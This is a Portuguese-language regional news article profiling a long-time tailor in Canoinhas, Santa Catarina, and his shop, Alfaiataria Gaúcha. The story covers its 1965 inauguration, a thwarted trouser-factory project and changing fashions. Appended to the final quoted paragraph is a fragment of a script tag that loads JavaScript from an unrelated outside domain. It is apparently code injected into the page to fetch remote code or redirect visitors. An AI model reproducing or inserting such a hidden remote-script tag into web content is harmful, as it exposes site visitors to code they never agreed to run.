InícioCuriosidades do PassadoHistórias de Sucesso e Tradição- ALFAIATARIA GAÚCHA

Histórias de Sucesso e Tradição- ALFAIATARIA GAÚCHA

Últimas notícias

Guerra Mundial: entenda riscos de conflito entre Israel e Irã

O risco de uma nova guerra mundial existe caso...

Parada 120 – Hamburgueria artesanal em Três Barras

Conheça o melhor delivery de hambúrgueres artesanais de Três...

Senado aprova isenção de IR para quem ganha até dois salários mínimos

O Senado aprovou nesta quarta-feira (17) o projeto de...

 

A história de vida do Senhor Vitorio Maievski está entrelaçada com a evolução no modo de vestir. Da roupa confeccionada nas alfaiatarias para as produzidas em escala industrial.

Proprietário da Alfaiataria Gaúcha (Canoinhas-SC) iniciou as atividades, de alfaiate, como aprendiz na antiga Renner, na época instalada em Canoinhas. A princípio, sua alfaiataria esteve localizada no Alto das Palmeiras. Em sociedade, fundou a atual alfaiataria Gaúcha. A inauguração, no ano de 1965, foi um momento memorável para a região. Trouxeram os cantores Mary Terezinha e Teixerinha para abrilhantar o evento.

VIDEO 00:00:33 –inauguração da alfaiataria Gaúcha

 

 

O projeto da Alfaiataria Gaúcha era ambicioso. Projetaram uma fábrica de calças solicitando financiamento. Na época haviam lançado a marca “calça tropeira”. Fabricavam 300 calças por mês. A meta era de 3.000 calças ao mês e contavam com 20 costureiras treinadas. Devido a problemas burocráticos, com o banco, não conseguiram concretizar os planos. Um sonho que poderia ter mudado a vida dele e a economia da região.

Sempre apoiado pela esposa, que também trabalhou na alfaiataria e posteriormente com a costura feminina, ele recorda de passagens vividas na profissão de alfaiate.

Vídeo 00:0045 Recordando a profissão de alfaiate

 

Seu Maievski registra as mudanças no mundo da moda. Desde a alteração no padrão de medidas das roupas como no estilo de vestir.

Vídeo :00:01:04 Mudanças no estilo de vestir

 

O tradicional alfaiate canoinhense atende, nos dias de hoje, clientes de Três Barras, Major Vieira, Irineópolis e Vela Vista do Todo. Em suas palavras: “Procuramos, em todos esses anos de trabalho, prezar pelo bom atendimento e cumprir a palavra, dar um prazo e a roupa ficar pronta naquele dia”.… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.